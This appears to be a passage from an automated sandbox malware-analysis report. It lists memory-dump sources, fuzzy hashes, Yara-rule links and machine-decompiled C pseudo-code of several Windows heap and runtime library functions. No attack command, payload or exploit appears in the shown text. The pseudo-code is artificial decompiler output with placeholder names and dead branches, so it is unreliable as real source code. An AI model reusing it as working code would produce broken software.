0x1e3b8a4a
0x1e3b8a52
0x1e3b8a9c
0x1e3b8aae
0x1e3b8a58
0x1e3b8a5e
0x1e3b8a6a
0x1e3b8a6f
0x1e3b8a75
0x1e3b8a7d
0x1e3b8a85
0x1e3b8a86
0x1e3b8a89
0x1e3b8a93
0x1e3b8a99
0x1e3b8a9b
0x00000000
0x1e3b8aaf
0x1e3b8abe
0x1e3b8ac3
0x1e3b8acb
0x1e3b8ad7
0x1e3b8ae0
0x1e3b8af1
0x00000000
0x1e3b8af1
0x1e3b8acd
0x1e3b8ad5
0x1e3b8afb
0x1e3b8afd
0x1e3b8aff
0x1e3b8b07
0x1e3b8b22
0x1e3b8b24
0x1e3b8b2a
0x1e3b8b2e
0x1e3b8b3f
0x1e3b8b78
0x1e3b8b41
0x1e3b8b52
0x1e3b8b54
0x1e3b8b5c
0x1e3b8b74
0x1e3b8b74
0x1e3b8b5c
0x1e3b8b3f
0x1e3b8b5e
0x1e3b8b61
0x1e3b8b64
0x1e3b8b64
0x1e3b8b6c
0x1e3b8b6c
0x1e3b8b11
0x1e409cd5
0x1e409cd5
0x1e3b8b17
0x1e3b8b1a
0x1e3b8b1a
0x00000000
0x1e3b8ad5
0x1e3b8a89

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49eff7aab31c6b46a154f3a691aa369bb7a006be0d5823fea8ff7ee5008000a2
Instruction ID: 36dd6a3f29f044ee3c111a3d1afb8a8ba66386f92586dec5e7cf5296eaf4e3bd
Opcode Fuzzy Hash: 49eff7aab31c6b46a154f3a691aa369bb7a006be0d5823fea8ff7ee5008000a2
Instruction Fuzzy Hash: 524172B4A0022D9FDB24CF25C898AA9B3F9FB44300F1047E9D91A97641D770DE80CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1E4722AE, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E4722AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E1E4721E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x1e38ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1e496110; // 0x22cee795
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1e496110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E1E3BFFB0(_t77, _t114, _t114);
						}
						_t63 = E1E472FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E1E3C2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x1e4722b9
0x1e4722c2
0x1e4722c6
0x1e4722c8
0x1e4722d8
0x1e4722e2
0x1e472303
0x1e472314
0x1e472321
0x1e47234a
0x1e47235b
0x1e47236c
0x1e472372
0x1e472376
0x1e47238f
0x1e47238f
0x1e4723b4
0x1e4723c6
0x1e4723c9
0x1e4723cc
0x1e4723cf
0x1e4723cf
0x1e4723e9
0x1e4723ee
0x1e4723f8
0x1e4723fb
0x1e4723fb
0x1e472403
0x1e47240a
0x1e472378
0x1e47237b
0x1e472381
0x1e472385
0x1e472385
0x1e47238d
0x00000000
0x00000000
0x1e47238d
0x1e472376
0x1e472417

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
Instruction ID: ad9b03e02d4ce8881876fabb58f8f7246c089924273f0ebe406c573eadae0999
Opcode Fuzzy Hash: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
Instruction Fuzzy Hash: 7041E6715043428BC308CF25C8A19BABBE1EF85625F014B5EF4D19B282CF34D44AD7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1E4720A8, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1E4720A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1e496110; // 0x22cee795
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1e496110; // 0x22cee795
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E1E472E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1e496110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E1E472E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1e496110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E1E472E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1e496110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1e496110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x1e4720a8
0x1e4720b0
0x1e4720b6
0x1e4720ba
0x1e4720be
0x1e4720c4
0x1e4720cb
0x1e4720db
0x1e4720e4
0x1e4720e7
0x1e4720e9
0x1e4720ef
0x1e4720f1
0x1e4720fe
0x1e472102
0x1e472105
0x1e472105
0x1e472107
0x1e47210d
0x1e472112
0x1e472115
0x1e472120
0x1e472120
0x1e472107
0x1e472126
0x1e472131
0x1e472133
0x1e47213e
0x1e47213e
0x1e472140
0x1e472146
0x1e47214b
0x1e472156
0x1e472156
0x1e472140
0x1e47215f
0x1e472165
0x1e472170
0x1e472172
0x1e47217d
0x1e47217d
0x1e47217f
0x1e472185
0x1e472192
0x1e472192
0x1e47217f
0x1e472170
0x1e472197
0x1e472199
0x1e4721a1
0x1e4721b1
0x1e4721bf
0x1e4721d6
0x1e4721d6
0x1e4721bf
0x1e4721dd
0x1e4721e5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
Instruction ID: 91289e9b3362289ef518821740720981c83df55ef1accae0ccad59135934b566
Opcode Fuzzy Hash: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
Instruction Fuzzy Hash: 1E418473E1402A8BCB18CF64C4915BAB3F1FB4870575642BED815AB255DB34BD41CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00562B72, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a272c5c0fe16053f4ac9f69e95832c214c7284570f83bff4497fdbec3df938a3
Instruction ID: 66a2b1c16e93795e47f9f18432f171af75817337bdbcbf9a4530907ce05454bd
Opcode Fuzzy Hash: a272c5c0fe16053f4ac9f69e95832c214c7284570f83bff4497fdbec3df938a3
Instruction Fuzzy Hash: 95312474600302AFE3105F64C889B963F64FF49374FA14264F856872E2C7B5CDC5CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E472D07, Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E472D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E1E4721E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x1e38ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x1e38ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x1e38ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x1e38ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1e496110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1e496110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1e496110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E1E3BB090(_v24, _t91, _v12, _t29);
			}

0x1e472d1f
0x1e472d2c
0x1e472d31
0x1e472d33
0x1e472d42
0x1e472d4b
0x1e472d51
0x1e472d5d
0x1e472d62
0x1e472d6e
0x1e472d71
0x1e472d7d
0x1e472d87
0x1e472d8d
0x1e472d91
0x1e472da5
0x1e472db7
0x1e472dc8
0x1e472dcf
0x1e472dd1
0x1e472dd3
0x1e472dd6
0x1e472ddb
0x1e472ddd
0x00000000
0x1e472ddf
0x1e472df5
0x1e472e0e
0x1e472e12
0x1e472e1a
0x1e472e1c
0x00000000
0x00000000
0x00000000
0x00000000
0x1e472e14
0x1e472e16
0x1e472e22
0x1e472e22
0x1e472e18
0x1e472e18
0x00000000
0x1e472e18
0x1e472e16
0x1e472df7
0x1e472df7
0x1e472dfc
0x1e472e04
0x1e472e06
0x1e472e1e
0x1e472e1e
0x00000000
0x00000000
0x00000000
0x00000000
0x1e472dfe
0x1e472e00
0x1e472e08
0x1e472e08
0x1e472e02
0x1e472e02
0x00000000
0x1e472e02
0x1e472e00
0x1e472dfc
0x00000000
0x1e472df5
0x1e472ddf
0x1e472e26
0x1e472e26
0x1e472e3c

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
Instruction ID: 0c7eb00457a3679edd3c2642be1a297abae6b3a4398d53debf40ae9d7df9a310
Opcode Fuzzy Hash: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
Instruction Fuzzy Hash: CA4129719041654FC749CB66C8A0AFA7FF1FF85201B1642EBD881EB242DA38D546D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E4269A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1E4269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1e49d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L1E3B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E1E426BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E1E3E9980() >= 0) {
							E1E3C2280(_t56, 0x1e498778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1e498774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1e498774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E1E3AB6F0(0x1e38c338, 0x1e38c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E1E3E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E1E3E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E1E3BFFB0(_t68, _t77, 0x1e498778);
				}
				_pop(_t78);
				return E1E3EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x1e4269b5
0x1e4269be
0x1e4269c3
0x1e4269c9
0x1e4269cc
0x1e4269d1
0x1e4269d3
0x1e4269de
0x1e4269e1
0x1e4269ea
0x1e4269f6
0x1e4269fe
0x1e426a13
0x1e426a14
0x1e426a15
0x1e426a16
0x1e426a1e
0x1e426a26
0x1e426a31
0x1e426a36
0x1e426a37
0x1e426a40
0x1e426a49
0x1e426a4a
0x1e426a53
0x1e426a59
0x1e426a5d
0x1e426a5e
0x1e426a64
0x1e426a67
0x1e426a6a
0x1e426a6d
0x1e426a70
0x1e426a77
0x1e426a7d
0x1e426a86
0x1e426a89
0x1e426a9c
0x1e426a9f
0x1e426aa2
0x1e426aa5
0x1e426aaf
0x1e426ab1
0x1e426ab8
0x1e426ab9
0x1e426abb
0x1e426abe
0x1e426ac5
0x1e426ac5
0x1e426aaf
0x1e426a40
0x1e426a26
0x1e4269fe
0x1e426ace
0x1e426ad0
0x1e426ad3
0x1e426ad8
0x1e426adf
0x1e426adf
0x1e426ae8
0x1e426aef
0x1e426aef
0x1e426af9
0x1e426b06

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea125b90a912c927d6a11d65a66e4da5c4f911e1775925c51d8feef83d5e77f
Instruction ID: f81dc932572256259c3c4aa7890e2871b176013f62bec445ccea834a0df34a4e
Opcode Fuzzy Hash: 0ea125b90a912c927d6a11d65a66e4da5c4f911e1775925c51d8feef83d5e77f
Instruction Fuzzy Hash: DF418CB1D00259AFDB14CFA8D940BEEBBF9FF88314F14867AE915A7640DB30A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1E3A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E1E3A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1E3E95D0();
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E1E3BEB70(_t54, 0x1e4979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E1E3E95D0();
								L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E1E3BEB70(_t54, 0x1e4979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E1E3EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E1E3BEB70(_t54, 0x1e4979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1E3E95D0();
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x1e3a5220
0x1e3a5224
0x1e400d13
0x1e400d16
0x1e400d19
0x1e3a522a
0x1e3a522a
0x1e3a522d
0x1e3a522d
0x1e3a5231
0x1e3a5235
0x1e3a5239
0x1e400d5c
0x1e400d62
0x00000000
0x00000000
0x1e400d6a
0x1e400d7b
0x1e400d7f
0x1e400d81
0x1e400d84
0x1e400d95
0x1e400d95
0x1e400d6c
0x1e400d71
0x1e400d71
0x1e400d9a
0x00000000
0x1e3a524a
0x1e3a524a
0x1e3a5250
0x1e400d24
0x1e400d35
0x1e400d39
0x1e400d3b
0x1e400d3e
0x1e400d50
0x1e400d50
0x1e400d26
0x1e400d2b
0x1e400d2b
0x00000000
0x1e400d55
0x1e3a5256
0x1e3a525b
0x1e3a5265
0x1e400da7
0x1e3a526b
0x1e3a526e
0x1e3a5272
0x1e400db1
0x1e400db4
0x1e400dc5
0x1e400dc5
0x1e3a5272
0x1e3a5278
0x1e3a527e
0x1e3a528a
0x1e3a528c
0x1e3a528d
0x00000000
0x1e3a5280
0x1e3a5282
0x1e3a5288
0x1e3a529f
0x1e3a5292
0x00000000
0x1e3a5292
0x00000000
0x1e3a5288
0x1e3a527e

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63eb79b1b239faed259402cff645b98ca951d082ba8c8eb1a16a62e0004433d0
Instruction ID: 0bc7ef8a0235d4d41f1b50779cc1b90a796ffd85fc7a25f327ceea1a48d161b5
Opcode Fuzzy Hash: 63eb79b1b239faed259402cff645b98ca951d082ba8c8eb1a16a62e0004433d0
Instruction Fuzzy Hash: 7A31F431111651EBC7269B69CC90BA677A6FF50760F114F3BE9594B6E0DB70F840C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1E3DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1e480220);
				E1E3FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1e497b9c; // 0x0
				_t55 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E1E3FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1e497b10 =  *0x1e497b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x1e49536c; // 0x7431f8
					if( *_t51 != 0x1e495368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1e495368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x1e49536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E1E3DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x1e3da61c
0x1e3da61e
0x1e3da623
0x1e3da628
0x1e3da62b
0x1e3da62d
0x1e3da648
0x1e3da64a
0x1e3da64f
0x1e419b44
0x1e3da6ec
0x1e3da6f1
0x1e3da6f1
0x1e3da655
0x1e3da657
0x1e3da65a
0x1e3da65d
0x1e3da662
0x1e3da663
0x1e3da667
0x1e3da668
0x1e3da66d
0x1e3da706
0x1e3da706
0x1e419bda
0x1e419be6
0x1e419beb
0x00000000
0x1e419beb
0x1e3da679
0x1e419b7a
0x00000000
0x1e419b7a
0x1e3da683
0x1e3da6f4
0x1e3da6f7
0x1e3da6f9
0x1e3da6fd
0x1e3da6a0
0x1e3da6a0
0x1e3da6ad
0x1e3da6af
0x1e3da6b4
0x1e419ba7
0x1e419bac
0x00000000
0x00000000
0x1e419bc6
0x1e419bce
0x1e419bd1
0x1e419bd3
0x1e419bd3
0x00000000
0x1e419bd1
0x1e3da6bd
0x1e3da6c3
